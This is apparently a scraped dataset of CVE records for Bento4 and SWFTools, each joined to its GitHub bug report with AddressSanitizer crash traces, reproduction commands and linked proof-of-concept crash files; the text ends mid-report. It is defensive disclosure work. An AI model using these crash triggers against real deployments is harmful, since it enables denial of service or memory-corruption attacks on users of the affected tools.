[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:*:*:*:*:*:*:*:*", "matchCriteriaId": "180AEBD6-AF89-4F0F-856E-D8B977C762C0", "versionEndExcluding": null, "versionEndIncluding": "1.6.0-639", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/756
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
Hello, I use fuzzer to test bianry mp4split, and found some vulnerabilities,the following is the details. # Bug1 ``` root@c511e4bf49bc:/mp4split/mp4split# ./mp4split FishFuzz/crashes/id:000000,sig:06,src:000011,op:flip1,pos:31240,1216870 ================================================================= ==2589461==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000000cfdb21 at pc 0x0000009a6c6c bp 0x7ffec6ff0d60 sp 0x7ffec6ff0510 READ of size 237 at 0x000000cfdb21 thread T0 #0 0x9a6c6b in __interceptor_fwrite.part.57 /llvm/llvm-project/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1143 #1 0x7ab8fa in AP4_StdcFileByteStream::WritePartial(void const*, unsigned int, unsigned int&) (/mp4split/mp4split/mp4split+0x7ab8fa) #2 0x471cf7 in AP4_ByteStream::Write(void const*, unsigned int) (/mp4split/mp4split/mp4split+0x471cf7) #3 0x4d1be1 in AP4_HdlrAtom::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x4d1be1) #4 0x41378f in AP4_AtomListWriter::Action(AP4_Atom*) const (/mp4split/mp4split/mp4split+0x41378f) #5 0x483213 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x483213) #6 0x41378f in AP4_AtomListWriter::Action(AP4_Atom*) const (/mp4split/mp4split/mp4split+0x41378f) #7 0x483213 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x483213) #8 0x41378f in AP4_AtomListWriter::Action(AP4_Atom*) const (/mp4split/mp4split/mp4split+0x41378f) #9 0x483213 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x483213) #10 0x40d872 in main (/mp4split/mp4split/mp4split+0x40d872) #11 0x7f7ce8910c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #12 0x407689 in _start (/mp4split/mp4split/mp4split+0x407689) 0x000000cfdb21 is located 63 bytes to the left of global variable 'AP4_GlobalOptions::g_Entries' defined in '/Bento4-1.5.1-629/Source/C++/Core/Ap4Utils.cpp:37:56' (0xcfdb60) of size 8 0x000000cfdb21 is located 0 bytes to the right of global variable 'AP4_String::EmptyString' defined in '/Bento4-1.5.1-629/Source/C++/Core/Ap4String.cpp:39:18' (0xcfdb20) of size 1 'AP4_String::EmptyString' is ascii string '' SUMMARY: AddressSanitizer: global-buffer-overflow /llvm/llvm-project/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:1143 in __interceptor_fwrite.part.57 Shadow bytes around the buggy address: 0x000080197b10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x000080197b20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f9 0x000080197b30: f9 f9 f9 f9 00 00 00 f9 f9 f9 f9 f9 00 00 00 f9 0x000080197b40: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 f9 f9 f9 0x000080197b50: f9 f9 f9 f9 00 00 00 00 00 00 00 00 00 f9 f9 f9 =>0x000080197b60: f9 f9 f9 f9[01]f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9 0x000080197b70: f9 f9 f9 f9 00 00 00 f9 f9 f9 f9 f9 00 00 00 00 0x000080197b80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x000080197b90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x000080197ba0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x000080197bb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==2589461==ABORTING ``` # Bug2 ``` root@c511e4bf49bc:/mp4split/mp4split# ./mp4split FishFuzz/crashes/id:000001,sig:06,src:000011,op:flip1,pos:31415,1226899 AddressSanitizer:DEADLYSIGNAL ================================================================= ==2659777==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000096b50a bp 0x7ffda4354030 sp 0x7ffda4353e70 T0) ==2659777==The signal is caused by a READ memory access. ==2659777==Hint: address points to the zero page. #0 0x96b50a in AP4_DescriptorListWriter::Action(AP4_Descriptor*) const (/mp4split/mp4split/mp4split+0x96b50a) #1 0x88e625 in AP4_EsDescriptor::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x88e625) #2 0x896a7f in AP4_Expandable::Write(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x896a7f) #3 0x4bdbcd in AP4_EsdsAtom::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x4bdbcd) #4 0x41378f in AP4_AtomListWriter::Action(AP4_Atom*) const (/mp4split/mp4split/mp4split+0x41378f) #5 0x61dbf8 in AP4_SampleEntry::Write(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x61dbf8) #6 0x41378f in AP4_AtomListWriter::Action(AP4_Atom*) const (/mp4split/mp4split/mp4split+0x41378f) #7 0x676f0b in AP4_StsdAtom::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x676f0b) #8 0x41378f in AP4_AtomListWriter::Action(AP4_Atom*) const (/mp4split/mp4split/mp4split+0x41378f) #9 0x483213 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x483213) #10 0x41378f in AP4_AtomListWriter::Action(AP4_Atom*) const (/mp4split/mp4split/mp4split+0x41378f) #11 0x483213 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x483213) #12 0x41378f in AP4_AtomListWriter::Action(AP4_Atom*) const (/mp4split/mp4split/mp4split+0x41378f) #13 0x483213 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x483213) #14 0x41378f in AP4_AtomListWriter::Action(AP4_Atom*) const (/mp4split/mp4split/mp4split+0x41378f) #15 0x483213 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x483213) #16 0x41378f in AP4_AtomListWriter::Action(AP4_Atom*) const (/mp4split/mp4split/mp4split+0x41378f) #17 0x483213 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/mp4split/mp4split/mp4split+0x483213) #18 0x40d872 in main (/mp4split/mp4split/mp4split+0x40d872) #19 0x7f1636a2cc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #20 0x407689 in _start (/mp4split/mp4split/mp4split+0x407689) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/mp4split/mp4split/mp4split+0x96b50a) in AP4_DescriptorListWriter::Action(AP4_Descriptor*) const ==2659777==ABORTING ``` # poc [crash.zip](https://github.com/axiomatic-systems/Bento4/files/9565816/crash.zip) # environment Ubuntu 18.04(docker) # credit Yuhang Huang ([NCNIPC of China](http://www.nipc.org.cn/)),(Zhongguancun Laboratory) Han Zheng ([NCNIPC of China](http://www.nipc.org.cn/), [Hexhive](http://hexhive.epfl.ch/)),(Zhongguancun Laboratory) Thansk for your time!
there are some vulnerabilities in binary mp4split
https://api.github.com/repos/axiomatic-systems/Bento4/issues/756/comments
2
2022-09-14T11:20:27Z
2023-06-26T06:40:26Z
https://github.com/axiomatic-systems/Bento4/issues/756
1,372,814,057
756
CVE-2022-40774
2022-09-18T19:15:09.277
An issue was discovered in Bento4 through 1.6.0-639. There is a NULL pointer dereference in AP4_StszAtom::GetSampleSize.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/757" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:*:*:*:*:*:*:*:*", "matchCriteriaId": "180AEBD6-AF89-4F0F-856E-D8B977C762C0", "versionEndExcluding": null, "versionEndIncluding": "1.6.0-639", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/757
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
Hi There, I tested the binary mp42ts with my fuzzer, and a crash incurred, i.e., SEGV on an unknown address error. Here are the details: ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==6287==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000007021ab bp 0x7fff9e86cb50 sp 0x7fff9e86c5f0 T0) ==6287==The signal is caused by a READ memory access. ==6287==Hint: address points to the zero page. #0 0x7021ab in AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&) (/fuzztest/mp42ts/mp42ts+0x7021ab) #1 0x5754fc in AP4_AtomSampleTable::GetSample(unsigned int, AP4_Sample&) (/fuzztest/mp42ts/mp42ts+0x5754fc) #2 0x40d0cb in TrackSampleReader::ReadSample(AP4_Sample&, AP4_DataBuffer&) (/fuzztest/mp42ts/mp42ts+0x40d0cb) #3 0x418342 in main (/fuzztest/mp42ts/mp42ts+0x418342) #4 0x7f9ae1a41c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) #5 0x407c99 in _start (/fuzztest/mp42ts/mp42ts+0x407c99) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/fuzztest/mp42ts/mp42ts+0x7021ab) in AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&) ==6287==ABORTING ``` ### System Details Test Machine: Ubuntu 18.04 (docker) Project Name: mp42ts (Bento4-1.6.0-639) ### Command ./mp42ts mp42ts.demo /dev/null ### Poc [mp42ts_Poc.zip](https://github.com/axiomatic-systems/Bento4/files/9590796/mp42ts_Poc.zip) ### Credit Wanying Cao (NCNIPC of China), (Zhongguancun Laboratory) Han Zheng (NCNIPC of China, [Hexhive](http://hexhive.epfl.ch/)), (Zhongguancun Laboratory)
SEGV at AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&) in binary mp42ts
https://api.github.com/repos/axiomatic-systems/Bento4/issues/757/comments
2
2022-09-17T03:04:47Z
2023-06-26T09:40:27Z
https://github.com/axiomatic-systems/Bento4/issues/757
1,376,646,543
757
CVE-2022-40775
2022-09-18T19:15:09.323
An issue was discovered in Bento4 through 1.6.0-639. A NULL pointer dereference occurs in AP4_StszAtom::WriteFields.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/758" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:*:*:*:*:*:*:*:*", "matchCriteriaId": "180AEBD6-AF89-4F0F-856E-D8B977C762C0", "versionEndExcluding": null, "versionEndIncluding": "1.6.0-639", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/758
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
Hi there, I use my fuzzer for fuzzing the binary mp4decrypt, and this binary crashes with the following: ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==24087==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000702ee8 bp 0x7ffcf40a75f0 sp 0x7ffcf40a73b0 T0) ==24087==The signal is caused by a READ memory access. ==24087==Hint: address points to the zero page. #0 0x702ee8 in AP4_StszAtom::WriteFields(AP4_ByteStream&) (/fuzztest/mp4decrypt/mp4decrypt+0x702ee8) #1 0x82facf in AP4_AtomListWriter::Action(AP4_Atom*) const (/fuzztest/mp4decrypt/mp4decrypt+0x82facf) #2 0x4fc423 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/fuzztest/mp4decrypt/mp4decrypt+0x4fc423) #3 0x82facf in AP4_AtomListWriter::Action(AP4_Atom*) const (/fuzztest/mp4decrypt/mp4decrypt+0x82facf) #4 0x4fc423 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/fuzztest/mp4decrypt/mp4decrypt+0x4fc423) #5 0x82facf in AP4_AtomListWriter::Action(AP4_Atom*) const (/fuzztest/mp4decrypt/mp4decrypt+0x82facf) #6 0x4fc423 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/fuzztest/mp4decrypt/mp4decrypt+0x4fc423) #7 0x82facf in AP4_AtomListWriter::Action(AP4_Atom*) const (/fuzztest/mp4decrypt/mp4decrypt+0x82facf) #8 0x4fc423 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/fuzztest/mp4decrypt/mp4decrypt+0x4fc423) #9 0x82facf in AP4_AtomListWriter::Action(AP4_Atom*) const (/fuzztest/mp4decrypt/mp4decrypt+0x82facf) #10 0x4fc423 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/fuzztest/mp4decrypt/mp4decrypt+0x4fc423) #11 0x82facf in AP4_AtomListWriter::Action(AP4_Atom*) const (/fuzztest/mp4decrypt/mp4decrypt+0x82facf) #12 0x62cea7 in AP4_Processor::Process(AP4_ByteStream&, AP4_ByteStream&, AP4_ByteStream*, AP4_Processor::ProgressListener*, AP4_AtomFactory&) (/fuzztest/mp4decrypt/mp4decrypt+0x62cea7) #13 0x412846 in main (/fuzztest/mp4decrypt/mp4decrypt+0x412846) #14 0x7fcaa49f1c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) #15 0x407c99 in _start (/fuzztest/mp4decrypt/mp4decrypt+0x407c99) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/fuzztest/mp4decrypt/mp4decrypt+0x702ee8) in AP4_StszAtom::WriteFields(AP4_ByteStream&) ==24087==ABORTING ``` ### System Details Test Machine: Ubuntu 18.04 (docker) Project Name: mp4decrypt (Bento4-1.6.0-639) ### Command ./mp4decrypt mp4decrypt.demo /dev/null ### Poc [mp4decrypt_Poc.zip](https://github.com/axiomatic-systems/Bento4/files/9591036/mp4decrypt_Poc.zip) ### Credit Wanying Cao(NCNIPC of China), (Zhongguancun Laboratory) Han Zheng (NCNIPC of China, [Hexhive](http://hexhive.epfl.ch/)), (Zhongguancun Laboratory)
SEGV error
https://api.github.com/repos/axiomatic-systems/Bento4/issues/758/comments
0
2022-09-17T06:02:37Z
2023-06-26T09:41:06Z
https://github.com/axiomatic-systems/Bento4/issues/758
1,376,678,566
758
CVE-2022-40008
2022-09-20T20:15:10.510
SWFTools commit 772e55a was discovered to contain a heap-buffer overflow via the function readU8 at /lib/ttf.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/188" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:2021-12-16:*:*:*:*:*:*:*", "matchCriteriaId": "BB9D1BB0-75D0-4C0B-8297-540D6A24F722", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/matthiaskramm/swftools/issues/188
[ "Exploit", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
system info Ubuntu x86_64, clang 10.0, ttftool (latest master https://github.com/matthiaskramm/swftools/commit/772e55a271f66818b06c6e8c9b839befa51248f4) Command line ./src/ttftool poc ``` ================================================================= ==26368==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000000086 at pc 0x0000004edfd2 bp 0x7ffe607a9f10 sp 0x7ffe607a9f08 READ of size 1 at 0x603000000086 thread T0 #0 0x4edfd1 in readU8 /project/models/swftools/lib/ttf.c:83:12 #1 0x4edfd1 in os2_parse /project/models/swftools/lib/ttf.c:467:30 #2 0x4edfd1 in ttf_parse_tables /project/models/swftools/lib/ttf.c:1849:13 #3 0x4edfd1 in ttf_load /project/models/swftools/lib/ttf.c:2180:9 #4 0x51054c in ttf_open /project/models/swftools/lib/ttf.c:2435:17 #5 0x4c51da in main /project/models/swftools/src/ttftool.c:91:19 #6 0x7f84d73a1082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) #7 0x41c43d in _start (/project/models/swftools/src/ttftool+0x41c43d) 0x603000000086 is located 0 bytes to the right of 22-byte region [0x603000000070,0x603000000086) allocated by thread T0 here: #0 0x494b7d in malloc (/project/models/swftools/src/ttftool+0x494b7d) #1 0x4e083a in ttf_load /project/models/swftools/lib/ttf.c:2160:15 #2 0x51054c in ttf_open /project/models/swftools/lib/ttf.c:2435:17 #3 0x7f84d73a1082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) SUMMARY: AddressSanitizer: heap-buffer-overflow /project/models/swftools/lib/ttf.c:83:12 in readU8 Shadow bytes around the buggy address: 0x0c067fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c067fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c067fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c067fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c067fff8000: fa fa 00 00 00 04 fa fa 00 00 00 06 fa fa 00 00 =>0x0c067fff8010:[06]fa fa fa 00 00 06 fa fa fa fd fd fd fd fa fa 0x0c067fff8020: 00 00 02 fa fa fa 00 00 00 02 fa fa fa fa fa fa 0x0c067fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==26368==ABORTING ``` [poc](https://gitee.com/XinglinYu98/poc/blob/master/ttftool/id:000001,sig:06,src:000000,op:flip1,pos:59)
heap-buffer-overflow exists in the function readU8 in lib/ttf.c
https://api.github.com/repos/swftools/swftools/issues/188/comments
0
2022-07-28T08:51:57Z
2022-07-28T08:59:46Z
https://github.com/swftools/swftools/issues/188
1,320,609,012
188
CVE-2022-40009
2022-09-20T20:15:10.550
SWFTools commit 772e55a was discovered to contain a heap-use-after-free via the function grow_unicode at /lib/ttf.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/190" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:2021-12-16:*:*:*:*:*:*:*", "matchCriteriaId": "BB9D1BB0-75D0-4C0B-8297-540D6A24F722", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/matthiaskramm/swftools/issues/190
[ "Exploit", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
system info Ubuntu x86_64, clang 10.0, ttftool (latest master https://github.com/matthiaskramm/swftools/commit/772e55a271f66818b06c6e8c9b839befa51248f4) Command line ./src/ttftool poc ``` ================================================================= ==26408==ERROR: AddressSanitizer: heap-use-after-free on address 0x60300000017c at pc 0x0000004942df bp 0x7ffdd79c0b40 sp 0x7ffdd79c0308 WRITE of size 48 at 0x60300000017c thread T0 #0 0x4942de in __asan_memset (/project/models/swftools/src/ttftool+0x4942de) #1 0x4cd29a in memset /usr/include/x86_64-linux-gnu/bits/string_fortified.h:71:10 #2 0x4cd29a in grow_unicode /project/models/swftools/lib/ttf.c:1235:2 #3 0x4cd29a in cmap_parse /project/models/swftools/lib/ttf.c:1283:6 #4 0x4eb056 in ttf_parse_tables /project/models/swftools/lib/ttf.c:1901:2 #5 0x4eb056 in ttf_load /project/models/swftools/lib/ttf.c:2180:9 #6 0x51054c in ttf_open /project/models/swftools/lib/ttf.c:2435:17 #7 0x4c51da in main /project/models/swftools/src/ttftool.c:91:19 #8 0x7fe8b7a25082 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x24082) #9 0x41c43d in _start (/project/models/swftools/src/ttftool+0x41c43d) 0x60300000017c is located 0 bytes to the right of 28-byte region [0x603000000160,0x60300000017c) freed by thread T0 here: #0 0x494e99 in realloc (/project/models/swftools/src/ttftool+0x494e99) #1 0x517e2d in rfx_realloc /project/models/swftools/lib/mem.c:50:11 previously allocated by thread T0 here: #0 0x494cf2 in calloc (/project/models/swftools/src/ttftool+0x494cf2) #1 0x518011 in rfx_calloc /project/models/swftools/lib/mem.c:69:9 SUMMARY: AddressSanitizer: heap-use-after-free (/project/models/swftools/src/ttftool+0x4942de) in __asan_memset Shadow bytes around the buggy address: 0x0c067fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c067fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c067fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c067fff8000: fa fa 00 00 00 04 fa fa 00 00 00 06 fa fa fd fd 0x0c067fff8010: fd fa fa fa fd fd fd fd fa fa 00 00 02 fa fa fa =>0x0c067fff8020: 00 00 00 02 fa fa fd fd fd fd fa fa fd fd fd[fd] 0x0c067fff8030: fa fa 00 00 00 04 fa fa fa fa fa fa fa fa fa fa 0x0c067fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==26408==ABORTING ``` [poc](https://gitee.com/XinglinYu98/poc/blob/master/ttftool/id:000002,sig:06,src:000000,op:flip1,pos:71)
heap-use-after-free exists in the function grow_unicode in /lib/ttf.c
https://api.github.com/repos/swftools/swftools/issues/190/comments
0
2022-07-28T08:56:02Z
2022-07-28T08:59:20Z
https://github.com/swftools/swftools/issues/190
1,320,614,087
190
CVE-2022-35085
2022-09-21T00:15:10.207
SWFTools commit 772e55a2 was discovered to contain a memory leak via /lib/mem.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Cvjark/Poc/blob/main/swftools/gif2swf/CVE-2022-35085.md" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/181" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:-:*:*:*:*:*:*:*", "matchCriteriaId": "05E27E60-6223-457B-BF90-E747C9C5DEE1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/matthiaskramm/swftools/issues/181
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
Hi, I currently learn to use fuzz tech to detect bugs and I found something in this repo. in order to reproduce the crash info, please attach ASAN when you compile this repo. # gif2swf ## heap-buffer-overflow ### reproduce please use command : `./gif2swf -o /dev/null [sample file]` to reproduce the crash ### crash_sample [id1_HEAP_BUFFER_OVERFLOW.zip](https://github.com/matthiaskramm/swftools/files/9034327/id1_HEAP_BUFFER_OVERFLOW.zip) ### crash info ``` ==32466==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x619000000964 at pc 0x0000004ae3e4 bp 0x7ffce30cd590 sp 0x7ffce30ccd40 WRITE of size 8 at 0x619000000964 thread T0 #0 0x4ae3e3 in __asan_memcpy /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22 #1 0x4f8002 in MovieAddFrame /home/bupt/Desktop/swftools/src/gif2swf.c:328:25 #2 0x4fb951 in main /home/bupt/Desktop/swftools/src/gif2swf.c:728:17 #3 0x7f9f1d7dec86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #4 0x41cfb9 in _start (/home/bupt/Desktop/swftools/build/bin/gif2swf+0x41cfb9) 0x619000000964 is located 4 bytes to the right of 992-byte region [0x619000000580,0x619000000960) allocated by thread T0 here: #0 0x4af580 in malloc /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x4f698e in MovieAddFrame /home/bupt/Desktop/swftools/src/gif2swf.c:310:29 #2 0x4fb951 in main /home/bupt/Desktop/swftools/src/gif2swf.c:728:17 #3 0x7f9f1d7dec86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22 in __asan_memcpy Shadow bytes around the 